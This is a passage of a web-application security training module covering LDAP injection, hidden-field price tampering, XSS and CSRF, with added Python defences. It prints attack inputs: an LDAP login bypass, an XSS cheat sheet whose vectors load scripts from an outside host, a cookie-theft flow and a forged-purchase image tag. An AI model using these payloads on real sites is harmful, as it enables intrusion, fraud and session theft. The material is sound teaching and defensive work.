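The fix for the require() call above is not to filter the DRINK value but to stop using it as a file name at all: the parameter selects an entry in a fixed table of templates, and anything outside the table is refused. The following Python is an added example, not the module's own code; the template table, the simulated orders.php handler and the scheme list are assumptions for the demonstration. The detection helper flags the two shapes a file-inclusion attempt takes in a request parameter, a URL scheme (remote inclusion or a PHP stream wrapper) and a ".." path component (local inclusion).

```python
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import urlsplit

# Allowlist: the only DRINK values the page may take, each mapped to the
# template it loads. Constructed to mirror the module's form; a real
# application would fill it from its own template directory.
DRINK_TEMPLATES = {
    "pepsi": "pepsi.php",
    "coke": "coke.php",
}
DEFAULT_DRINK = "coke"
# Schemes that turn an include into a remote fetch or a stream wrapper.
INCLUSION_SCHEMES = ("http", "https", "ftp", "php", "data", "file")


def resolve_drink_template(drink_param: Optional[str]) -> Optional[str]:
    """Return the template for a DRINK value, the default when the parameter
    is absent, or None when the value is not in the allowlist.

    Same decision as the PHP above, but the parameter selects an entry in a
    fixed table instead of being concatenated into require().
    """
    if drink_param is None:
        return DRINK_TEMPLATES[DEFAULT_DRINK]
    return DRINK_TEMPLATES.get(drink_param)


def looks_like_file_inclusion(value: str) -> bool:
    """Detection check for a request parameter: a URL scheme or a '..'
    component is the signature of remote or local file inclusion."""
    if urlsplit(value).scheme.lower() in INCLUSION_SCHEMES:
        return True
    return ".." in PurePosixPath(value).parts


def handle_orders_request(query: dict) -> tuple:
    """Simulated handler for orders.php: returns (HTTP status, template or None)."""
    value = query.get("DRINK")
    template = resolve_drink_template(value)
    if template is None:
        # Refuse the request; the caller can log the rejected value.
        return (400, None)
    return (200, template)
```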
What Is LDAP Injection?
An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree
Filter syntax: (attributeName operator value)
Operator    Example
=           (objectclass=user)
>=          (mdbStorageQuota>=100000)
<=          (mdbStorageQuota<=100000)
~=          (displayName~=Foeckeler)
*           (displayName=*John*)
AND (&)     (&(objectclass=user)(displayName=John))
OR (|)      (|(objectclass=user)(displayName=John))
NOT (!)     (!objectClass=group)
• LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries
• LDAP is based on the client-server model and clients can search the directory entries using filters
What Is LDAP Injection?
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All inputs to LDAP must be properly filtered; otherwise, vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed from LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail to validate their input. LDAP directory services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters.
FIGURE 13.10: LDAP Injection (LDAP filter syntax "(attributeName operator value)" with examples of the =, >=, <=, ~=, *, AND (&), OR (|) and NOT (!) operators)
How LDAP Injection Works
Normal operation: the client sends a normal query to the LDAP server and receives the normal result
Operation with code injection: the client sends a normal query plus injected code to the LDAP server and receives the normal result and/or additional information
• LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query
• To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques
• If an attacker enters the valid user name "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, i.e., only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password
Account Login form submitted by the attacker: Username juggyboy)(&)), Password blah
How LDAP Injection Works
LDAP injection attacks are commonly used on web applications. LDAP injection applies to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.
Depending upon the implementation of the target, one can try to achieve:
• Login Bypass
• Information Disclosure
• Privilege Escalation
• Information Alteration
FIGURE 13.11: Normal operation (the client sends a normal query to the LDAP server and receives the normal result)
FIGURE 13.12: Operation with code injection (the client sends a normal query plus injected code to the LDAP server and receives the normal result and/or additional information)
Attack
If an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server; only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password.
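The login bypass above works because the username is pasted into the filter text and the ")" characters in it close the USER component early. The following Python is an added example (not the module's code) of the two defences a practitioner would want here: escaping each assertion value per RFC 4515 before it is placed in the filter, so parentheses, asterisks and backslashes become data, and a structural check that refuses to send any filter string that is not exactly one balanced filter. The USER/PASS filter shape and the inputs are taken from the walkthrough above; everything else is constructed for the demonstration.

```python
# RFC 4515 escapes for the characters that carry meaning inside an LDAP filter.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied assertion value so it cannot open or close
    filter components or add wildcards."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(user: str, password: str) -> str:
    """The vulnerable shape from the module: values pasted into the filter text."""
    return f"(&(USER={user})(PASS={password}))"


def build_login_filter(user: str, password: str) -> str:
    """Same filter, but each value is escaped and therefore data only."""
    return f"(&(USER={escape_filter_value(user)})(PASS={escape_filter_value(password)}))"


def is_single_filter(filter_text: str) -> bool:
    """Structural check on a filter string before it is sent: exactly one
    balanced top-level filter and nothing outside it. An injected ')' either
    unbalances the string or splits it into two filters, and both are refused."""
    depth = 0
    completed = 0
    for ch in filter_text:
        if ch == "(":
            if depth == 0 and completed:
                return False  # a second filter starts after the first one closed
            depth += 1
        elif ch == ")":
            if depth == 0:
                return False  # close without a matching open
            depth -= 1
            if depth == 0:
                completed += 1
        elif depth == 0:
            return False  # characters outside any filter
    return depth == 0 and completed == 1


# Constructed inputs matching the module's walkthrough.
INJECTED_USER = "juggyboy)(&))"
PASSWORD = "blah"

if __name__ == "__main__":
    unsafe = build_login_filter_unsafe(INJECTED_USER, PASSWORD)
    safe = build_login_filter(INJECTED_USER, PASSWORD)
    print("unsafe:", unsafe, "single filter:", is_single_filter(unsafe))
    print("safe:  ", safe, "single filter:", is_single_filter(safe))
```

With escaping in place the injected username becomes juggyboy\29\28&\29\29, a literal string that matches no account; the structural check is the detection side, useful as a last line before the query leaves the application and as a rule over query logs.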
FIGURE 13.13: Attack (the attacker submits the Account Login form with Username juggyboy)(&)) and Password blah; the LDAP server receives the normal query plus injected code and returns the normal result and/or additional information)
Hidden Field Manipulation Attack
Normal Request:
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
Attack Request:
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
HTML Code:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
Rendered form: Product Name [Juggyboy Shirt], Product Price [200], Submit
• When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST)
• HTML can also store field values as hidden fields, which are not rendered to the screen by the browser, but are collected and submitted as parameters during form submissions
• Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server
Hidden Field Manipulation Attack
Hidden field manipulation attacks are mostly used against e-commerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At the time of development of such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the prices of the product and complete a transaction with a price that he or she has altered, rather than the actual price of the product. For example: On eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10.
This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, it often also loses its credibility in the market.
When any target requests web services and makes choices on the HTML page, the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; they are not displayed on the monitor of the target but saved and placed in the form of strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server.
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.
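The server-side counterpart to the steps above, as an added Python example (not code from the module): page.aspx is simulated by process_order(), which never charges the price the browser sent back. Two independent defences are shown, an HMAC over the hidden fields so any edit to PRICE is detected, and a server-side catalog lookup so the client's price is not authoritative even if the signature were missing. The key, the catalog and the form values are constructed for the demonstration; the product name and prices are the ones from the HTML above.

```python
import hashlib
import hmac
from typing import Dict, Optional, Tuple
from urllib.parse import urlencode

# Constructed values for the example; a real deployment keeps the key in a
# secrets store and the catalog in its database.
SERVER_SECRET = b"constructed-demo-key-not-for-production"
CATALOG: Dict[str, str] = {"Juggyboy Shirt": "200.00"}


def price_for(product: str) -> Optional[str]:
    """Authoritative price lookup on the server; the client never supplies it."""
    return CATALOG.get(product)


def sign_fields(fields: Dict[str, str]) -> str:
    """HMAC tag over a canonical encoding of the fields, emitted as one more
    hidden field so the server can tell whether the others were edited."""
    canonical = urlencode(sorted(fields.items())).encode()
    return hmac.new(SERVER_SECRET, canonical, hashlib.sha256).hexdigest()


def verify_fields(fields: Dict[str, str], tag: str) -> bool:
    """Constant-time comparison of the recomputed tag with the submitted one."""
    return hmac.compare_digest(sign_fields(fields), tag)


def render_order_form(product: str) -> Dict[str, str]:
    """What the server puts into the page: product, price and the signature."""
    fields = {"product": product, "PRICE": price_for(product) or ""}
    fields["sig"] = sign_fields({"product": fields["product"], "PRICE": fields["PRICE"]})
    return fields


def process_order(form: Dict[str, str]) -> Tuple[bool, Optional[str]]:
    """Handle the POST to page.aspx: returns (accepted, price charged).

    The signature catches any edit to the hidden fields; the catalog lookup
    means the price is never taken from the client at all.
    """
    fields = {"product": form.get("product", ""), "PRICE": form.get("PRICE", "")}
    if not verify_fields(fields, form.get("sig", "")):
        return (False, None)
    real_price = price_for(fields["product"])
    if real_price is None or real_price != fields["PRICE"]:
        return (False, None)
    return (True, real_price)


if __name__ == "__main__":
    form = render_order_form("Juggyboy Shirt")
    print("untouched form:", process_order(form))
    print("price edited to 2.00:", process_order(dict(form, PRICE="2.00")))
```

A rejected order with a valid-looking product but a mismatched PRICE is worth logging on its own: it is the direct signature of the electronic-shoplifting attempt described in the steps above.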
FIGURE 13.14: Hidden Field Manipulation Attack (the normal request http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00 carries the hidden field Price = 200.00 from the HTML code; the attack request changes it to http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00)
Cross-Site Scripting (XSS) Attacks
• Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users
• It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering
• Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests
XSS attacks are used for:
• Malicious script execution
• Redirecting to a malicious server
• Exploiting user privileges
• Ads in hidden IFRAMES and pop-ups
• Data manipulation
• Session hijacking
• Brute force password cracking
• Data theft
• Intranet probing
• Keylogging and remote monitoring
Cross-Site Scripting (XSS) Attacks

Cross-site scripting is also called XSS. The vulnerability arises when a web application takes input from one user and includes it, unvalidated and unencoded, in dynamic content that it sends to other users' browsers for rendering. An attacker who controls that input can inject JavaScript, VBScript, ActiveX, HTML, or Flash that executes in the victim's browser, hidden inside what looks like a legitimate request or page. Because the injected script runs in the origin of the trusted application, the attacker inherits the user's trust in that application and can do things that would not be allowed under normal conditions. Attackers often encode the malicious portion of the tag (Unicode, HTML entities, URL encoding) so that the request looks genuine to the user and slips past naive filters. Attacks that XSS makes possible include:
- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden IFRAMEs and pop-ups
- Data manipulation
- Keylogging and remote monitoring
How XSS Attacks Work

This example uses a vulnerable page which handles requests for nonexistent pages, a classic 404 error page.
To understand how cross-site scripting is typically exploited, consider the following hypothetical example. The server handles requests for a nonexistent page (a classic 404 error page) by echoing the requested URI back into the response without encoding it.

Normal request:
http://juggyboy.com/jason_file.html

Server code:
<html>
<body>
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
</body>
</html>

Server response:
404 Not found
/jason_file.html

XSS attack code:
http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>

Server response: the script tag is written into the page verbatim, so the browser executes it and shows the alert. The attacker did not need to compromise the server; the server's own page delivered the attacker's script under the server's origin.

FIGURE 13.15: How XSS Attacks Work
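The following is an added example (not code from this module) that models the 404 handler from Figure 13.15 in Python rather than PHP, side by side with the one-line fix: HTML-entity-encoding the attacker-controlled string before it is placed in the page body. The request URIs are constructed from the figure; the function names are assumptions.

```python
import html
from urllib.parse import quote, unquote

# Constructed sample requests based on the figure: the normal request and the
# attack URL as the browser actually sends it (percent-encoded on the wire).
NORMAL_URI = "/jason_file.html"
ATTACK_PAYLOAD = '<script>alert("WARNING: The application has encountered an error");</script>'
ATTACK_URI = "/" + quote(ATTACK_PAYLOAD)


def not_found_vulnerable(request_uri):
    """Mirrors the PHP in the figure: urldecode($_SERVER["REQUEST_URI"]) is
    concatenated into the HTML body unencoded, so markup in the URL becomes
    markup in the page."""
    return "<html><body>Not found: %s</body></html>" % unquote(request_uri)


def not_found_hardened(request_uri):
    """Same page with the one change that removes the reflected XSS: the
    attacker-controlled string is entity-encoded for the HTML body context.
    '<' becomes '&lt;' and '"' becomes '&quot;', so the browser renders text
    instead of executing script."""
    decoded = unquote(request_uri)
    return "<html><body>Not found: %s</body></html>" % html.escape(decoded, quote=True)


def contains_live_script(page):
    """Crude check used only to make the difference visible: a '<script' tag
    that survives into the response body means the payload will execute."""
    return "<script" in page.lower()


if __name__ == "__main__":
    for uri in (NORMAL_URI, ATTACK_URI):
        print("request   :", uri)
        print("vulnerable:", not_found_vulnerable(uri))
        print("hardened  :", not_found_hardened(uri))
```

Entity encoding is the correct defense for this context, the HTML body. Data reflected into an attribute value, a JavaScript string, a CSS property or a URL needs the encoding of that context instead; html.escape alone does not make a reflection into an inline script safe.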
Cross-Site Scripting Attack Scenario: Attack via Email

The attacker sends an email with a malicious link ("Hi, you have won a lottery of $2M, click the link to claim it."). The user clicks the malicious link; the server sends a page to the user with the client profile (Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010); the malicious code is executed in the client web browser.

In this example, the attacker crafts an email message with a malicious script and sends it to the victim:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. The legitimate server sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client machine.
Cross-Site Scripting Attack Scenario: Attack via Email

In a cross-site scripting attack via email, the attacker crafts an email that contains a link carrying a malicious script and sends it to the victim.

Malicious script:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. The server then sends a page back to the user that includes the value of clientprofile, and the malicious code is executed on the client's machine. This is reflected XSS: the script is never stored on the server, it round-trips through it in a single request and response.

The following diagram depicts the cross-site scripting attack via email: the attacker sends the email with the malicious link, the request is received by the legitimate server, and the server's response carries the script to the user's browser.

FIGURE 13.16: Attack via Email
XSS Example: Attack via Email

Malicious script:
<A HREF="http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

Flow: the attacker constructs the malicious link and emails the URL to the user, convincing the user to click on it; the user's browser requests the page from the legitimate server; the legitimate server returns the page with the malicious script; the script runs in the user's browser.
XSS Example: Attack via Email

The following are the steps involved in an XSS attack via email:
1. Construct a malicious link:
<A HREF="http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. The user requests the page.
4. The legitimate server sends a response page containing the malicious script.
5. The malicious script runs in the user's browser, in the origin of juggyboybank.com.
FIGURE 13.17: Attack via Email
XSS Example: Stealing Users' Cookies

The attacker hosts a page with a malicious script. The user views the page hosted by the attacker and receives HTML containing the malicious script; the script runs, collects the user's cookies, and redirects the browser to the attacker's server, sending the request with the user's cookies.
XSS Example: Stealing Users' Cookies

To steal a user's cookies with the help of an XSS attack, the attacker looks for an XSS vulnerability and then plants a cookie stealer (cookie logger) in the injected script.

The following are the steps involved in stealing a user's cookies with the help of an XSS attack:
1. The attacker hosts a page with a malicious script (or, equivalently, injects the script into the vulnerable site).
2. The user visits the page hosted by the attacker.
3. The attacker's server sends the response as HTML containing the malicious script.
4. The user's browser runs the malicious script.
5. The cookie logger in the malicious script collects the user's cookies, typically by reading document.cookie.
6. The malicious script redirects the user's browser to the attacker's server.
7. The user's browser sends the request with the user's cookies appended to it.

Cookies flagged HttpOnly are not exposed to document.cookie, which is why that flag is the standard mitigation for this particular payload; it does not stop the script from acting on the user's behalf while the page is open.
FIGURE 13.18: Stealing Users' Cookies
XSS Example: Sending an Unauthorized Request

The attacker constructs a malicious link and emails the URL to the user, convincing the user to click on it. The user's browser requests the page from the attacker's server, receives the page with the malicious script and runs it; the script sends a request the user never intended, which the target accepts as authorized.
XSS Example: Sending an Unauthorized Request

Using an XSS attack, the attacker can also make the victim's browser send a request the victim never intended. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. The attacker constructs a malicious link.
2. The attacker sends an email containing the URL to the user and convinces the user to click on it.
3. The user's browser sends a request to the attacker's server for the page.
4. The attacker's server, in response to the user's request, sends the page with the malicious script.
5. The user's browser runs the malicious script.
6. The malicious script sends a request that the user did not authorize; the receiving application treats it as authorized because it arrives from the user's browser with the user's session credentials.
FIGURE 1 3 .1 9 : S e n d in g an U n a u th o riz e d R e q u e st
XSS Attack in Blog Posting

Malicious code injected into the blog post:
<script>onload=window.location='http://www.juggyboy.com'</script>

The comment with the malicious code is stored on the server, and every user who views the post is redirected to the malicious website juggyboy.com.
XSS Attack in a Blog Posting

The following diagram depicts the XSS attack in a blog posting: the attacker adds a malicious script in the comment field of a blog post; the web application stores the comment, malicious link included, on the database server; when any user later views the post, the script runs in that user's browser and redirects it to the malicious website juggyboy.com.

Malicious code:
<script>onload=window.location='http://www.juggyboy.com'</script>

FIGURE 13.20: XSS Attack in a Blog Posting
XSS Attack in Comment Field

The user visits the Tech Post website. A post ("Facebook acquires file-sharing service: New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options") carries a comment:
Jason, I love your blog post!
- Mark (mark@miccasoft.com)

Malicious code injected into the comment:
<script>alert("Hello World")</script>

The comment with the malicious script is stored on the database server by the web application; the alert pops up as soon as the web page is loaded.
XSS Attack in a Comment Field

Many web applications build their HTML pages from data accepted dynamically from different sources, such as user comments, so the content of a page changes according to the request. Attackers abuse this by submitting a comment that contains HTML tags and a malicious script. When another user views the page that includes the comment, the stored script is executed in that user's browser. This is what distinguishes stored (persistent) XSS from the reflected examples above: no link has to be clicked, and every visitor to the page is affected until the comment is removed.
Malicious code:
<script>alert("Hello World")</script>

The attacker adds the malicious script in the comment field of the blog post ("Jason, I love your blog post! <script>alert("Hello World")</script>"); the comment with the malicious script is stored on the server, and the alert pops up as soon as the web page is loaded.

FIGURE 13.21: XSS Attack in a Comment Field
XSS Cheat Sheet

The following vectors (from RSnake's XSS cheat sheet at ha.ckers.org) are useful for probing filters. Many of them rely on legacy browser behaviour, such as javascript: URLs in IMG SRC, DYNSRC or LOWSRC attributes, which current browsers no longer execute; they still exercise a filter's handling of case, whitespace, entities and malformed markup, which is what they are for.

XSS locator: '';!--"<XSS>=&{()}
Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Image XSS: <IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Embedded tab: <IMG SRC="jav	ascript:alert('XSS');">
Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
Escaping JavaScript escapes: \";alert('XSS');//
End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Local htc file: <XSS STYLE="behavior: url(xss.htc);">
VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
Mocha: <IMG SRC="livescript:[code]">
US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
XSS with no single quotes or double quotes or semicolons: <SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
XSS Cheat Sheet

FIGURE 13.22: XSS Cheat Sheet
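The comment-field attack and the cheat sheet both concern markup that a user supplies and the application stores. Where comments must allow some formatting, encoding everything (as in the 404 example) is not an option and an allow-list sanitizer is needed: parse the markup the way the browser will, keep only known-safe tags and attributes, and rebuild the output. The following is an added example, not code from this module or from any product, of such a sanitizer built on Python's standard library; the allowed tag set, the scheme list and the sample comments are assumptions chosen for illustration.

```python
import html
from html.parser import HTMLParser

# Allow-list (an assumption for this example): only simple formatting and links.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
DROP_WITH_CONTENT = {"script", "style"}  # tags whose body must vanish too
VOID_TAGS = {"br"}


def safe_url(value):
    """Accept only relative URLs and the listed schemes. Control characters and
    whitespace are stripped first, because browsers ignore them inside a scheme:
    the cheat sheet's embedded tab/newline/carriage-return vectors rely on that."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme, sep, _ = cleaned.partition(":")
    if not sep:
        return True                      # no scheme at all: relative URL
    return scheme.lower() in SAFE_SCHEMES


class CommentSanitizer(HTMLParser):
    """Rebuilds the comment from parsed tokens instead of regex-filtering the raw
    string, so case tricks (JaVaScRiPt), entity-encoded attribute values
    (jav&#x09;ascript) and malformed tags are all seen as the browser sees them."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                       # unknown tag: drop it, keep its text
        kept = []
        for name, value in attrs:        # on* handlers never appear in the allow-list
            if name in ALLOWED_ATTRS.get(tag, set()) and value and safe_url(value):
                kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))  # text is always re-encoded


def sanitize_comment(raw):
    parser = CommentSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample comments: the one from the figure plus cheat-sheet vectors.
    for sample in (
        'Jason, I love your blog post!<script>alert("Hello World")</script>',
        "<IMG SRC=JaVaScRiPt:alert('XSS')>",
        "<a href=\"jav&#x09;ascript:alert('XSS')\">x</a>",
        '<b onmouseover="alert(1)">bold</b> &amp; <a href="https://example.com">link</a>',
    ):
        print(repr(sanitize_comment(sample)))
```

Two design points matter more than the particular tag list. First, the output is regenerated from the parse tree, so nothing from the input reaches the page without going through html.escape or the URL check; a deny-list that strips "<script>" from the raw string is exactly what the cheat sheet's case, entity and null-byte vectors are designed to get past. Second, the sanitizer must run on the way out (at render time) or on a canonical form stored on the way in, never on a string the browser will decode differently than the parser did.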
Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend.
The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.

Diagram: the user logs into the trusted site and creates a new session; the trusted site stores the session identifier for the session in a cookie in the web browser; the user visits a malicious website, which sends a request from the user's browser to the trusted site using his session cookie.
Cross-Site Request Forgery (CSRF) Attack

Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed, by a malicious web page, to send a request to a vulnerable website with which the user is already authenticated. CSRF vulnerabilities are commonly found on financial websites, where a forged request translates directly into a transfer or a purchase. Corporate intranets usually cannot be reached directly by outside attackers, so CSRF, which rides on the browser of a user who is already inside, is one way for an attacker to get requests into the network. The root cause is the web application's failure to differentiate a request generated by malicious code from a request the user genuinely intended: both arrive with the same session cookie.

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
FIGURE 13.23: Cross-site Request Forgery (CSRF) Attack
How CSRF Attacks Work

In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into clicking a malicious link or visiting a page that contains the attacker's code. When the user's browser loads it, the code makes the browser send a forged request to the trusted server, which carries out the requested action because the request arrives with the user's session cookie. No code of the attacker's runs on the trusted server; the server simply cannot tell the forged request from a genuine one. The following diagram explains the step-by-step process of a CSRF attack:
Server code (trusted server):
<?php
session_start();
if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares']))
{
    buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
}
?>

Client-side code (the legitimate buy form):
<form action="buy.php" method="POST">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Shares: <input type="text" name="shares" /></p>
<p><input type="submit" value="Buy" /></p>
</form>

Malicious code (on the attacker's page):
<img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=1000" />

Steps:
1. The user logs into the trusted server using his credentials.
2. The server sets a session cookie in the user's browser.
3. The attacker sends a phishing mail tricking the user into requesting a page from the malicious site.
4. The user requests a page from the malicious server.
5. The response page contains the malicious code.
6. The browser fetches the image URL, sending the forged request to the trusted server together with the session cookie, and the malicious request is executed on the trusted server.

Because the server reads $_REQUEST, it accepts the parameters from the query string as well as from the POST body; that is what lets a plain <img> tag, which can only issue a GET, forge the purchase.
F IG U R E 1 3 .2 4 : H o w CSRF A tta c k s W o r k
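The following is an added example (not code from this module) that models the buy.php handler from Figure 13.24 in Python, once as drawn and once hardened with a synchronizer token bound to the session via HMAC. The session identifier, the forged query string and the function names are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Server-side secret for deriving per-session tokens (generated at startup).
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session_id).
    A token lifted from one session is useless against another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_buy_form(session_id):
    """The legitimate form from the figure, with the token as a hidden field.
    The attacker's page cannot read this field because of the same-origin policy."""
    return ('<form action="buy.php" method="POST">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<p>Symbol: <input type="text" name="symbol"></p>'
            '<p>Shares: <input type="text" name="shares"></p>'
            '<p><input type="submit" value="Buy"></p></form>' % csrf_token(session_id))


def _fields(encoded):
    return {k: v[0] for k, v in parse_qs(encoded).items()}


def buy_stocks_vulnerable(session_id, method, query, body):
    """Mirrors the PHP in the figure: parameters are taken from the query string
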